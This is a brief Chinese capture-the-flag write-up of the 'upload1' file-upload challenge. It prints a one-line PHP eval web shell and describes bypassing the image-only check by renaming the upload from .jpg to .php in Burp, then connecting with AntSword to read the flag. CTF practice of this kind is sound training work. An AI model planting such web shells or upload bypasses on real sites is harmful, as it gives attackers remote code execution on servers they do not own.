攻防世界系列 :upload1 1.打开题目,文件上传。 2.立即上传shell
1.php <?php @eval($_POST[root]); ?>
提示只能上传图片 3.burp改报文 把1.jpg改为1.php 上传成功 4.蚁剑连接 一顿乱翻找到了flag.php
upload1
原文:https://www.cnblogs.com/hugboy/p/adword_upload1.html
